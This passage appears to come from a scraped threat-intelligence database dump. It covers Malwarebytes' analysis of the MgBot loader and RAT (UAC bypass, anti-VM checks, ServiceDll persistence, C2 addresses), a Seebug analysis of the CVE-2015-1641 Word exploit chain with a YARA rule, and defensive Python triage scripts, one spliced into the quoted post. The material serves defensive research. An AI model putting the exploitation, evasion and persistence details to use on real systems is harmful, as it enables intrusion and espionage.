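            'TargetMode="External"/></Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", document)
        zf.writestr("word/settings.xml", settings)
        zf.writestr("word/_rels/settings.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    for kind, detail in triage(build_sample_docx()):
        print(f"{kind}: {detail}")
```

Run triage on the lure document first and then on the template it fetches: in this campaign the lure only carries the attachedTemplate reference, and the DDE field lives in the downloaded template, so a clean field-code scan of the lure alone proves nothing.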
This loader pretends to be a _Realtek Audio Manager tool_ (Figure 12).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/Screen-Shot-2020-07-07-at-5.07.25-PM-300x115-1.png> \"\" )Figure 12: File version information\n\nIt has four embedded resources, two of which are in Simplified Chinese. This is an indicator that suggests this campaign is likely operated by a Chinese APT group. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/Screen-Shot-2020-07-07-at-5.07.58-PM-2.png> \"\" )Figure 13: Resource language\n\nThe loader starts its process by escalating privilege through a UAC bypass using the [CMSTPLUA COM interface](<https://cqureacademy.com/cqure-labs/cqlabs-how-uac-bypass-methods-really-work-by-adrian-denkiewicz>).\n\nMgBot uses several anti-analysis and anti-virtualization techniques. The code is self-modifying, which means it alters its code sections at runtime. This makes static analysis of the sample harder.\n\nMgBot tries to avoid running in known virtualized environments such as _VMware_, _Sandboxie_ and _VirtualBox_. To identify whether it is running in one of these environments, it looks for the following DLL files: _vmhgfs.dll_, _sbiedll.dll_ and _vboxogl.dll_; if it finds any of them, it enters an infinite loop without doing any malicious activity (Figure 14).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/virutalizationChecks-1.png> \"\" )Figure 14: Anti-VMs\n\nIt also checks for the presence of security products on the victim's machine and takes a different execution flow if a security product is detected. For example, it checks for _zhudongfangyu.exe, 360sd.exe, 360Tray.exe, MfeAVSvc.exe and McUICnt.exe_ in different parts of the code (Figure 15). The malware does not perform all the checks at once; it rather checks a couple of them at different steps of its execution. 
\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/av-1.png> \"\" )Figure 15: Security products checks\n\nTo invoke the required APIs, the malware does not call them directly but instead builds a function pointer table for the required APIs. Each API call is made by accessing the relevant index of this table. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/apis-1.png> \"\" )Figure 16: Building function pointer table\n\nAs an example, when the malware needs to invoke _WinExec_, it does so by invoking it through its index in the function pointer table.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/winexec-1.png> \"\" )Figure 17: Calling API through use of function pointer table\n\nAfter building the required API call table, the malware performs the following procedures: \n\n * It calls _CreateFileW_ to create _iot7D6E.tmp_ (a random name starting with iot) in the _%APPDATA%Temp_ directory. This tmp file is a cab file that embeds the final payload.\n * It calls _WriteFile_ to populate its content\n * It calls _CreateProcessInternalW_ to invoke _expand.exe_ to decompress the content of _iot7D6E.tmp_ into _ProgramData\\Microsoft\\PlayReady\\MSIBACF.tmp\\tmp.dat_ (the _MSIBACF.tmp_ directory name is generated randomly and starts with MSI followed by a combination of random numbers and characters)\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/expand-1.png> \"\" )Figure 18: Calling expand.exe\n\n * It calls _CopyFileW_ to copy tmp.dat into _pMsrvd.dll_\n * It calls _DeleteFileW_ to delete _tmp.dat_\n * It drops _DBEngin.EXE_ and _WUAUCTL.EXE_ in the _ProgramData\\Microsoft\\PlayReady_ directory. Both of these files are copies of _rundll32.exe_, used later to execute the dropped DLL.\n * It modifies the _HKLM\\SYSTEM\\CurrentControlSet\\Services\\AppMgmt_ registry key to make itself persistent. 
To perform this modification, it drops two registry files named iix*.tmp (random numbers appended to iix) into the %APPDATA%Temp directory, which hold the old and new contents of that registry key.\n\nTo load the dropped DLL (_pMsrvd.dll_) the loader registers it as the service DLL of an already installed service, AppMgmt, so that the service loads the payload, as shown in the following images:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/reg2new-1.png> \"\" )Figure 18: ServiceDll\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/regnew1-1.png> \"\" )Figure 19: ImagePath\n\nFinally, it executes the dropped DLL by running _net start AppMgmt_. After loading the DLL, the loader creates a cmd file (_lgt*.tmp_.cmd) in the _%APPDATA%TEMP_ directory with the content shown in Figure 20, then executes it to delete the cmd file and the loader from the victim's machine. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/cmdnew-1.png> \"\" )Figure 20: cmd file\n\nWe were able to identify several different variants of this loader. In general, all the variants drop the final payload using _expand.exe_ or _extrac32.exe_ and then use "net start _AppMgmt_" or "net start StiSvc" to execute the dropped DLL with one of the following configurations:\n\n * svchost.exe -k netsvcs -p -s AppMgmt\n * svchost.exe -k netsvcs\n * svchost.exe -k imgsvc\n\nThe dropped DLL is the main payload used by this threat actor to perform malicious activities. The following shows its file version information, pretending to be a _Video Team Desktop App_. \n\nFigure 21: File info\n\nThe creation time for this DLL appears to be "2008-04-26 16:41:12". However, the Rich header data indicates that this timestamp may have been tampered with by the threat actor. \n\nFigure 22: Rich header\n\nThe DLL has eight export functions with carefully selected names to pretend they are doing normal tasks. 
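A check for the AppMgmt/StiSvc persistence described above, added as an example (not from the post): it parses the text produced by `reg export HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt appmgmt.reg` and flags a ServiceDll that no longer points at the service's own DLL, or an ImagePath that is not svchost.exe. The expected DLL names (appmgmts.dll for AppMgmt, wiaservc.dll for StiSvc) are the Windows 10 defaults and an assumption of this example that should be verified against a known-good host; the .reg text below is constructed, using the pMsrvd.dll path the post reports.

```python
"""Check an exported Services registry key for the ServiceDll hijack described above.

Added example, not code from the Malwarebytes post. It parses the text that
`reg export HKLM\\SYSTEM\\CurrentControlSet\\Services\\AppMgmt appmgmt.reg`
produces (and the same for StiSvc) and flags a ServiceDll that no longer
points at the service's own DLL, or an ImagePath that is not svchost.exe.
Assumptions: the expected DLLs below are the Windows 10 defaults (appmgmts.dll
for AppMgmt, wiaservc.dll for StiSvc); verify them against a known-good host.
The .reg text is constructed for the demo with the pMsrvd.dll path the post reports.
"""
import re

EXPECTED_SERVICE_DLL = {
    "AppMgmt": r"%systemroot%\system32\appmgmts.dll",
    "StiSvc": r"%systemroot%\system32\wiaservc.dll",
}


def parse_reg_export(text: str) -> dict[str, dict[str, str]]:
    """Parse the .reg subset regedit emits for service keys: [key] headers,
    "name"="string" values and "name"=hex(2):.. (REG_EXPAND_SZ as UTF-16LE hex)."""
    keys, current = {}, None
    text = re.sub(r"\\\r?\n\s*", "", text)        # join regedit's continuation lines
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
            continue
        if current is None or "=" not in line:
            continue
        name, _, raw = line.partition("=")
        name = name.strip('"')
        if raw.startswith('"'):
            value = raw[1:-1].replace('\\"', '"').replace("\\\\", "\\")
        elif raw.startswith("hex(2):"):
            data = bytes(int(b, 16) for b in raw[len("hex(2):"):].split(",") if b)
            value = data.decode("utf-16-le").rstrip("\0")
        else:
            value = raw                             # dword:..., hex:..., left as written
        keys[current][name] = value
    return keys


def check_service_dll(keys: dict[str, dict[str, str]]) -> list[str]:
    """Findings for services whose ServiceDll or ImagePath has been redirected."""
    findings = []
    for key, values in keys.items():
        parts = key.split("\\")
        if "Services" not in parts or parts.index("Services") + 1 >= len(parts):
            continue
        svc = parts[parts.index("Services") + 1]   # ...\Services\<svc> or \<svc>\Parameters
        expected = EXPECTED_SERVICE_DLL.get(svc)
        if expected is None:
            continue
        dll = values.get("ServiceDll")
        if dll is not None and dll.lower() != expected:
            findings.append(f"{svc}: ServiceDll redirected to {dll}")
        image = values.get("ImagePath")
        if image is not None and "svchost.exe" not in image.lower():
            findings.append(f"{svc}: ImagePath is not svchost.exe: {image}")
    return findings


def _reg_expand_sz(s: str) -> str:
    """Encode a REG_EXPAND_SZ the way regedit exports it (used only to build the sample)."""
    hexbytes = [f"{b:02x}" for b in (s + "\0").encode("utf-16-le")]
    lines = [",".join(hexbytes[i:i + 25]) for i in range(0, len(hexbytes), 25)]
    return "hex(2):" + ",\\\n  ".join(lines)


# Constructed export: AppMgmt hijacked as in the post, StiSvc left at its default.
SAMPLE_REG = "\n".join([
    "Windows Registry Editor Version 5.00",
    "",
    r"[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AppMgmt]",
    '"DisplayName"="@appmgmts.dll,-3250"',
    '"ImagePath"=' + _reg_expand_sz(r"%SystemRoot%\system32\svchost.exe -k netsvcs -p -s AppMgmt"),
    '"Start"=dword:00000003',
    "",
    r"[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AppMgmt\Parameters]",
    '"ServiceDll"=' + _reg_expand_sz(r"C:\ProgramData\Microsoft\PlayReady\pMsrvd.dll"),
    "",
    r"[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\StiSvc\Parameters]",
    '"ServiceDll"=' + _reg_expand_sz(r"%SystemRoot%\System32\wiaservc.dll"),
])

if __name__ == "__main__":
    for finding in check_service_dll(parse_reg_export(SAMPLE_REG)):
        print(finding)
```

The same parser works on an export of the whole Services tree, which is the practical way to sweep a host for this technique: the post shows the actor swapping between AppMgmt and StiSvc, so check every svchost-hosted service rather than only the two named here by extending EXPECTED_SERVICE_DLL from a known-good machine.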
It checks the running services and, depending on the result, injects itself into the memory space of WmiPrvSE.exe. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/wmicode-1.png> \"\" )Figure 23: Injection into WmiPrvse.exe\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/wmi-1.png> \"\" )Figure 24: RAT's DLL is injected into memory space of WmiPrvse.exe\n\nIt uses several anti-debugging and anti-virtualization techniques to detect whether it is running in a virtualized environment or under a debugger. It uses the _GetTickCount_ and _QueryPerformanceCounter_ API calls to detect a debugger.\n\nTo detect whether it is running in a virtual environment, it uses anti-VM detection instructions such as _sldt_ and _cpuid_ that provide information about the processor, and also checks the VMware I/O port (VMXh).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/type-510x600-1.png> \"\" )Figure 25: Environment Detection\n\nAll the strings used by this RAT are either obfuscated or XOR encoded to make analysis harder. \n\nThis final piece of code bundled in MgBot is a Remote Administration Trojan with several capabilities such as: \n\n * C2 communication over TCP (42.99.116[.]225:12800)\n * Ability to take screenshots\n * Keylogging\n * File and directory management\n * Process management\n * Create MUTEX\n\n### Infrastructure relations\n\nThe following shows the infrastructure used by this APT and the relations between hosts used by this group. This APT group has used several different IP addresses to host its malicious payloads and also for its C2 communications.\n\nWhat is interesting is that the majority of IP addresses used by this APT are located in Hong Kong, and almost all of these Hong Kong-based IP addresses are used for C2 communication. Even in their past campaigns they have mostly used infrastructure in Hong Kong. 
The graph also shows the relationship between different IP addresses used by this APT group.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/VT-1-1.png> \"\" )Figure 26: Infrastructure connections\n\n### Android RAT\n\nWe also found several malicious Android applications we believe are part of the toolset used by this APT group. Malwarebytes detects them as _Android/Trojan.Spy.AndroRat.KSRemote_.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/android-1.png> \"\" )Figure 27: Malicious Android APK\n\nAll these bogus applications contain a jar file named _[ksremote.jar](<https://www.virustotal.com/gui/file/5f76192e952fd0002c1df4b66423ae803536ad82a1ae36bc9bfc6f73a7093b7f/detection>)_ that provides the RAT functionality:\n\n * Recording screen and audio using the phone's camera/mic\n * Locating phone with coordinates\n * Stealing phone contacts, call log, SMS, web history\n * Sending SMS messages\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/contacts-1.png> \"\" )Figure 28: Contact grabbing capability\n\nThis RAT communicates with C&C servers using random port numbers within the 122.10.89.170 to 179 range (all in Hong Kong).\n\n * 122.10.89[.]172:10560\n * 122.10.89[.]170:9552\n\n### TTPs in line with Chinese APTs\n\nThe lures used in this campaign indicate that the threat actor may be targeting the Indian government and individuals in Hong Kong, or at least those who are against the new security law issued by China.\n\nThe TTPs observed in these attacks have been used by several Chinese APT groups:\n\n * [Rancor](<https://unit42.paloaltonetworks.com/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/>) APT is known to use Certutil to download their payload\n * [KeyBoy](<https://www.pwc.co.uk/issues/cyber-security-services/research/the-keyboys-are-back-in-town.html>) is known to have used DDE in its previous campaigns\n * APT40 has utilized 
[Squiblydoo](<https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets>) and [template injection](<https://www.elastic.co/blog/advanced-techniques-used-in-malaysian-focused-apt-campaign>) in its previous campaigns.\n\nConsidering these factors, we attribute this APT attack with moderate confidence to a new Chinese APT group. Based on the TTPs used by this APT group, we were able to track back its activities to at least 2014. In all their campaigns the actor has used a variant of MgBot.\n\n### A threat actor with a long documented history\n\nA [Needle in a haystack](<https://www.virusbulletin.com/virusbulletin/2014/02/needle-haystack>) blog post from 2014 detailed a campaign that drops a Trojan disguised as a legitimate MP3 encoder library. In this campaign the actor used [CVE-2012-0158](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0158>) to drop its Trojan. The rest of the TTPs, including the methods used by the threat actor to execute MgBot and the registry modifications, are similar to this ongoing campaign.\n\nIn 2018, this group performed another operation in which they used a VBScript vulnerability ([CVE-2018-8174](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8174>)) to [initiate their attack](<http://771a8f83a0c6f08b2060d86fcbd40d36ee3a681beadb32ff6f288e2648c64bf9>) to drop a variant of MgBot. In March 2020, an archive file ([warning.rar](<http://bc85b5b1e69728b01e64266506904eacd6bbc1bf60a5e631cb35327e494f9815>)) was submitted to VirusTotal that we believe is part of another campaign used by this actor.\n\nWe will continue to monitor this group's activities to see if their targeting or techniques evolve. 
Malwarebytes users are protected from this campaign thanks to our signature-less anti-exploit layer.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/nebula_.png> \"\" )Figure 29: Malwarebytes Nebula blocking malicious Word document\n\n### MITRE ATT&CK techniques\n\n**Tactic**| **ID**| **Name**| **Details** \n---|---|---|--- \nExecution| [T1059](<https://attack.mitre.org/techniques/T1059>)| Command-Line Interface| Starts CMD.EXE for command execution \n| [T1106](<https://attack.mitre.org/techniques/T1106>)| Execution through Module Load| Loads dropped or rewritten executable: WUAUCTL.EXE, svchost.exe, rundll32.exe \n| [T1053](<https://attack.mitre.org/techniques/T1053>)| Rundll32| Uses RUNDLL32.EXE to load library \n| [T1064](<https://attack.mitre.org/techniques/T1064>)| Scripting| WScript.exe: Starts MSHTA.EXE for opening HTA or HTML files \n| [T1035](<https://attack.mitre.org/techniques/T1035>)| Service Execution| Starts NET.EXE for service management \n| [T1170](<https://attack.mitre.org/techniques/T1170>)| Mshta| Starts MSHTA.EXE for opening HTA or HTML files \n| [T1086](<https://attack.mitre.org/techniques/T1086>)| PowerShell| Executes PowerShell scripts \nPrivilege Escalation| [T1050](<https://attack.mitre.org/techniques/T1050>)| New Service| Creates or modifies Windows services through rundll32.exe \n| [T1088](<https://attack.mitre.org/techniques/T1088>)| Bypass UAC| Known privilege escalation attack through DllHost.exe \nPersistence| [T1031](<https://attack.mitre.org/techniques/T1031>)| Modify Existing Service| Creates or modifies Windows services through rundll32.exe \n| [T1050](<https://attack.mitre.org/techniques/T1050>)| New Service| Creates or modifies Windows services through rundll32.exe \nDefense Evasion| [T1107](<https://attack.mitre.org/techniques/T1107>)| File Deletion| Starts CMD.EXE for self-deleting \n| [T1085](<https://attack.mitre.org/techniques/T1085>)| Rundll32| Uses RUNDLL32.EXE to load library \n| [T1088](<https://attack.mitre.org/techniques/T1088>)| Bypass UAC| Known privilege escalation attack through DllHost.exe \n| [T1497](<https://attack.mitre.org/techniques/T1497/>)| Virtualization/Sandbox Evasion| The Loader uses several anti-virtualization detection techniques \n| [T1221](<https://attack.mitre.org/techniques/T1221/>)| Template Injection| Maldoc uses template injection to download remote template \n| [T1218](<https://attack.mitre.org/techniques/T1218/>)| Signed Binary Proxy Execution| Uses Squiblydoo to load executable \nDiscovery| [T1012](<https://attack.mitre.org/techniques/T1012>)| Query Registry| Reads the machine GUID from the registry \n| [T1082](<https://attack.mitre.org/techniques/T1082>)| System Information Discovery| Reads the machine GUID from the registry \n| [T1007](<https://attack.mitre.org/techniques/T1007>)| System Service Discovery| Starts NET.EXE for service management \nLateral Movement| [T1105](<https://attack.mitre.org/techniques/T1105>)| Remote File Copy| certutil.exe: Downloads executable files from the Internet; cmd.exe: Starts CertUtil for downloading files \nC&C| [T1105](<https://attack.mitre.org/techniques/T1105>)| Remote File Copy| certutil.exe: Downloads executable files from the Internet; cmd.exe: Starts CertUtil for downloading files \n\nTable 1: MITRE ATT&CK TTPs\n\n### IOCs\n\n**2a5890aca37a83ca02c78f00f8056e20d9b73f0532007b270dbf99d5ade59e2a** Boris Johnson Pledges to Admit 3 Million From Hong Kong to U.K.docx\n\n**fc885b50892fe0c27f797ba6670012cd3bbd5dc66f0eb8fdd1b5fca9f1ea98cc** BNOHK.docx.zip\n\n**3b93bc1e0c73c70bc8f314f2f11a91cf5912dab4c3d34b185bd3f5e7dd0c0790** Boris_Johnson_Pledges_to_Admit_3_Million_From_Hong_Kong_to_U.K.rar\n\n**ecf63a9430a95c34f85c4a261691d23f5ac7993f9ac64b0a652110659995fc03** Email security 
check.rar\n\n**1e9c91e4125c60e5cc5c4c6ef8cbb94d7313e20b830a1e380d5d84b8592a7bb6** Email security check.docx\n\n**3a04c1bdce61d76ff1a4e1fd0c13da1975b04a6a08c27afdd5ce5c601d99a45b** ADIN.docx (storm.sct)\n\n**855af291da8120a48b374708ef38393e7c944a8393880ef51352ce44e9648fd8** ADIN.docx (storm.sct)\n\n**1e81fb62cb57a3231642f66fee3e10d28a7c81637e4d6a03515f5b95654da585** ff.exe (storm.txt)\n\n**99aee7ae27476f057ef3131bb371a276f77a526bb1419bfab79a5fac0582b76a** cobalt strike\n\n**flash.governmentmm.com**: This domain was used by the actor to host remote templates. It was registered 3 months ago by someone in the United States.\n\n**MgBot samples**\n\n**45.77.245[.]0**: This IP has been used by Cobalt Strike as a C&C server. 
\n\n**42.99.116[.]225**: C&C server used by the final payload.\n\n**Android samples**\n\nb5304a0836baf1db8909128028793d12bd418ff78c69dc6f9d014cadede28b77 \n9aade1f7a1f067688d5da9e9991d3a66799065ffe82fca7bb679a71d89fec846 \n5f7f87db34340ec83314313ec40333aebe6381ef00b69d032570749d4cedee46\n\nThe post [Chinese APT group targets India and Hong Kong using new variant of MgBot malware](<https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {}, "published": "2020-07-21T15:00:00", "type": "malwarebytes", "title": "Chinese APT group targets India and Hong Kong using new variant of MgBot malware", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2018-8174"], "modified": "2020-07-21T15:00:00", "id": "MALWAREBYTES:22A53B0983AD9ADDB8E7F3DC1E2A1440", "href": "https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T12:21:09", "description": "Source: http://drops.wooyun.org/papers/9809\r\n\r\n### Microsoft Office Memory Corruption Vulnerability\r\n\r\n\r\n### 0x01 
Vulnerability Overview\r\n\r\nIn April this year Microsoft patched a Word type confusion vulnerability named CVE-2015-1641; an attacker can craft an RTF document with an embedded docx to carry out an attack. When Word parses a docx document and handles the displacedByCustomXML attribute, it does not validate the customXML object, so other tag objects can be passed in and processed instead, causing a type confusion that leads to an arbitrary memory write; ultimately, carefully crafted tags and matching attribute values can achieve remote arbitrary code execution.\r\n\r\nAccording to Microsoft's official MS15-33 security bulletin, this vulnerability covers Office 2007 SP3, Office 2010 SP2 (32-bit and 64-bit), Office 2013 SP1 (32-bit and 64-bit), Office 2013 RT SP1, Word for Mac 2011, and Office 2010/2013 and Office Web Apps 2010/2013 on SharePoint Server. In addition, Office 2010 SP1 has been verified to be affected as well, but Microsoft's patch for this vulnerability on Office 2010, KB2553428, was not released in an SP1 version, so Office 2010 SP1 still contains the vulnerability even with all updates installed.\r\n\r\nCVE-2015-1641 triggers very reliably and affects almost all Office versions Microsoft currently supports (except the newly released Office 2016), so its impact is very broad. Attack samples exploiting this vulnerability, both on VirusTotal and captured in the wild, have started to increase gradually. From this we can infer that attacks using this vulnerability will persist for a long time to come, and that it shows a tendency to replace CVE-2012-0158.\r\n\r\n### 0x02 Root Cause Analysis\r\n\r\nScanning the RTF document with Alibaba's Diting engine, we extracted an embedded Word document whose document.xml contains the following code. It contains 4 smartTag tags, each of which contains a permStart tag, and inside the permStart tags are moveFromRangeStart and moveFromRangeEnd tags carrying the displacedByCustomXml attribute:\r\n\r\n\r\n\r\nFirst, a short explanation of what these tags and attributes do. The smartTag tag is the smart tag used in Word and Excel: it recognizes names of people, dates, times, addresses, phone numbers and so on, and lets the user perform specific actions on them. For example, if Steve Jobs is recognized as a person's name, the smartTag can offer actions such as opening the address book, adding the person to contacts, or scheduling a meeting, giving Office users more customizable smart options. displacedByCustomXml can be used in many tags; it indicates that the content at the current tag is to be replaced by the content of a customXML: the value next means it is replaced by the next customXML, and prev means it is replaced by the previous one.\r\n\r\nThis vulnerability is a type confusion. Normally a tag carrying displacedByCustomXml is replaced by the previous or next customXML, but Word does not strictly validate the customXML object that is passed in, so an object such as a smartTag can be passed in instead. The processing flow for a smartTag object differs from that for customXML: the element attribute value of the specially handled smartTag is treated as an address, and a simple computation derives another address from it. Finally, the processing flow overwrites the address computed earlier with the id value of moveFromRangeEnd, resulting in an arbitrary memory write. The vulnerable code is as follows:\r\n\r\n\r\n\r\nThe patch comparison below makes it easy to see that the Word code with the latest patch adds validation in the function that handles customXML objects:\r\n\r\n\r\n\r\n### 0x03 Exploit Analysis\r\n\r\nThe analysis environment for the exploit is Windows 7 64-bit with Office 2010 SP2 32-bit.\r\n\r\nAlthough there are 4 smartTag tags above, as far as the current analysis goes the first two are the key to exploitation. First, when parsing the first smartTag tag, the id of its moveFromRangeEnd child tag is parsed and then written to the address 0x7c38bd74, which is computed from the smartTag's element value, 0x7c38bd50:\r\n\r\n\r\n\r\nThen the second smartTag tag is parsed; the memory esi points to is the smartTag structure, and the content at esi+4 is the element attribute value:\r\n\r\n\r\n\r\nThe value of eax is 0x7C376FC3, which is exactly the hexadecimal value of the moveFromRangeEnd object's id \"2084007875\":\r\n\r\n\r\n\r\nNext, 0x7c38a428 in MSVCR71.dll is overwritten. This is a virtual function pointer, and the address 0x7c38a428 is computed jointly from the current smartTag's element attribute value, 0x7c38bd68, and the id of the moveFromRangeStart in the first smartTag tag:\r\n\r\n\r\n\r\nIn the debugger the memory looks as follows. The memory at ecx is shown below; ecx+0xc holds the value written while parsing the first smartTag tag above, and the final computed address to be overwritten is 0x7c38a428:\r\n\r\n\r\n\r\nBefore the overwrite, the pointer at 0x7c38a428 points to kernel32!FlsGetValue:\r\n\r\n\r\n\r\nFinally, memcpy is called to perform the overwrite:\r\n\r\n\r\n\r\nAfter the overwrite, 0x7c38a428 points to the code location the attacker wants to execute:\r\n\r\n\r\n\r\nTo summarize the exploitation flow: first, a simple computation on the element attribute value of smartTag_1 (the first smartTag tag) yields an address addr1, and the id of its moveFromRangeEnd_1 child tag is written to addr1 for later use; then smartTag_2 is parsed, another address addr2 is computed jointly from its element attribute value and the previously computed addr1, and the id of its child tag moveFromRangeEnd_2 is written to addr2. Since addr2 is an address inside a virtual function table, the address of that virtual function is overwritten with the address of the arbitrary code the attacker wants to execute, and exploitation succeeds.\r\n\r\nOn unpatched Word in an Office 2010 environment, the address executed after the heap spray is 0x0900080C, as shown below:\r\n\r\n\r\n\r\nLooking at this memory region it should already be clear: this is the content of the activeX.bin file released by the RTF document. The code at 0x7c342404 is ret, so execution keeps hitting ret until it reaches the final ROP position. The ROP chain is as follows:\r\n\r\n\r\n\r\nUnsurprisingly, the purpose of the ROP chain is still to call the VirtualProtect function to add execute permission to this memory region:\r\n\r\n\r\n\r\nAfter obtaining execute permission, the shellcode starts to run:\r\n\r\n\r\n\r\n### 0x04 Exploit Detection\r\n\r\nTo detect attack samples for this vulnerability, the docx must first be extracted from the RTF document and document.xml obtained from it. The YARA rule is as follows:\r\n\r\n```\r\nrule CVE_2015_1641\r\n{\r\n meta:\r\n description=\"Word Type Confusion Vulnerability\"\r\n output=\"Nday & CVE-2015-1641\"\r\n strings:\r\n $smart_tag=/<w:smartTag[\\w\\W]+?w:element=\\\"(&#x[a-zA-Z0-9]{4};){2}\\\">[\\w\\W]+?<w:permStart[\\w\\W]+?w:displacedByCustomXml=\\\"prev\\\"\\/>[\\w\\W]+?<w:permEnd[\\w\\W]+?<\\/w:smartTag>/\r\n condition:\r\n $smart_tag\r\n}\r\n```\r\n\r\nThe rule above is really a single regular expression match; from left to right the flow is: 1. match a smartTag tag and check whether its element attribute is a hexadecimal value used as an address; 2. inside the smartTag tag, match a permStart tag whose attributes, or those of its child tags, contain displacedByCustomXml=\"prev\". If both conditions are met, the file is considered an attack sample for this vulnerability. The result of scanning this attack sample's document.xml with the YARA rule above is as follows:\r\n\r\n", "cvss3": {}, "published": "2015-12-31T00:00:00", "type": "seebug", "title": "Microsoft Office Memory Corruption Vulnerability (CVE-2015-1641)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-0158", "CVE-2015-1641"], "modified": "2015-12-31T00:00:00", "href": 
"https://www.seebug.org/vuldb/ssvid-90202", "id": "SSV:90202", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2021-06-08T19:16:46", "description": "MSCOMCTL.ocx code execution, .Net code execution, WinVerifyTrust digital signature validation vulnerability", "edition": 2, "cvss3": {}, "published": "2012-04-23T00:00:00", "type": "securityvulns", "title": "Microsoft Windows multiple security vulnerabilities", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2012-0163", "CVE-2012-0151"], "modified": "2012-04-23T00:00:00", "id": "SECURITYVULNS:VULN:12320", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12320", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securelist": [{"lastseen": "2020-06-03T11:50:54", "description": "\n\n## Key findings\n\nWhile investigating attacks related to a group named Cycldek post 2018, we were able to uncover various pieces of information on its activities that were not known thus far. In this blog post we aim to bridge the knowledge gap on this group and provide a more thorough insight into its latest activities and modus operandi. 
Here are some key insights that will be described in this publication:\n\n * Cycldek (also known as Goblin Panda and Conimes) has been active in the past two years, conducting targeted operations against governments in Southeast Asia.\n * Our analysis shows two distinct patterns of activity, indicating the group consists of two operational entities that are active under a mutual quartermaster.\n * We were able to uncover an extensive toolset for lateral movement and information stealing used in targeted networks, consisting of custom and unreported tools as well as living-off-the-land binaries.\n * One of the newly revealed tools is named USBCulprit and has been found to rely on USB media in order to exfiltrate victim data. This may suggest Cycldek is trying to reach air-gapped networks in victim environments or relies on physical presence for the same purpose.\n\n## Background\n\nCycldek is a long-known Chinese-speaking threat actor. Based on the group's past activity, it has a strong interest in Southeast Asian targets, with a primary focus on large organizations and government institutions in Vietnam. This is evident from a series of targeted campaigns that are publicly attributed to the group, as outlined below:\n\n * 2013 - indicators affiliated to the group were found in a network of a technology company operating in several sectors, as briefly [described](<https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-august-goblin-panda/>) by CrowdStrike.\n * 2014 - further accounts by CrowdStrike describe vast activity by the group against Southeast Asian organizations, most notably Vietnam. 
